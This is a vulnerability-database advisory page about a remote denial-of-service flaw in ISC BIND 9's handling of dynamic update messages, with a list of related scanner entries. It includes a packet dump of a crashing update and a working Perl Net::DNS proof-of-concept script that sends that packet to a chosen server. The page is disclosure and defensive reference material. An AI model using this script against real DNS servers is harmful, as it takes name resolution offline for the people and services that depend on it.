ISC BIND 9远程动态更新消息拒绝服务漏洞,需要升级到最新版
Reporter | Title | Published | Views | Family All 199 |
---|---|---|---|---|
Tenable Nessus | Oracle Linux 5 : bind (ELSA-2009-1179) | 12 Jul 201300:00 | – | nessus |
Tenable Nessus | CentOS 5 : bind (CESA-2009:1179) | 6 Jan 201000:00 | – | nessus |
Tenable Nessus | Slackware 10.0 / 10.1 / 10.2 / 11.0 / 12.0 / 12.1 / 12.2 / 8.1 / 9.0 / 9.1 / current : bind (SSA:2009-210-01) | 28 May 201100:00 | – | nessus |
Tenable Nessus | openSUSE 10 Security Update : bind (bind-6383) | 6 Oct 200900:00 | – | nessus |
Tenable Nessus | CentOS 3 : bind (CESA-2009:1181) | 30 Jul 200900:00 | – | nessus |
Tenable Nessus | RHEL 5 : bind (RHSA-2009:1179) | 30 Jul 200900:00 | – | nessus |
Tenable Nessus | AIX 6.1 TL 0 : bind (IZ56315) | 24 Jan 201300:00 | – | nessus |
Tenable Nessus | AIX 6.1 TL 3 : bind (IZ56318) | 24 Jan 201300:00 | – | nessus |
Tenable Nessus | AIX 6.1 TL 1 : bind (IZ56316) | 24 Jan 201300:00 | – | nessus |
Tenable Nessus | AIX 5.3 TL 10 : bind (IZ56314) | 24 Jan 201300:00 | – | nessus |
如下更新报文可导致BIND崩溃:
Packet in tcpdump:
15:38:11.676045 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 178) 10.2.0.205.59447 > 10.2.0.205.53: 17378 update [1a] [1n] [1au] SOA? 8.0.10.in-addr.arpa. 8.8.0.10.in-addr.arpa. ANY ns: [|domain]
Another view of the Packet:
| ;; HEADER SECTION
| ;; id = 181
| ;; qr = 0 opcode = UPDATE rcode = NOERROR
| ;; zocount = 1 prcount = 1 upcount = 1 adcount = 1
|
| ;; ZONE SECTION (1 record)
| ;; 8.0.10.in-addr.arpa. IN SOA
|
| ;; PREREQUISITE SECTION (1 record)
| 4.8.0.10.in-addr.arpa. 0 IN ANY ; no data
|
| ;; UPDATE SECTION (1 record)
| 4.8.0.10.in-addr.arpa. 0 ANY ANY ; no data
|
| ;; ADDITIONAL SECTION (1 record)
| office.example.com. 0 ANY TSIG HMAC-MD5.SIG-ALG.REG.INT. NOERROR
-----------------
#!/usr/bin/perl -w
use Net::DNS;
our $NSI = '<dns server>';
our $NSI_KEY_NAME = '<key name>';
our $NSI_KEY = '<key>';
my $rzone = '<zone>';
my $rptr = "1.$rzone";
my $packet = Net::DNS::Update->new($rzone);
$packet->push(
pre => Net::DNS::RR->new(
Name => $rptr,
Class => 'IN',
Type => 'ANY',
TTL => 0,
)
);
$packet->push(
update => Net::DNS::RR->new(
Name => $rptr,
Class => 'ANY',
Type => 'ANY',
)
);
$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;
print $packet->string;
Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo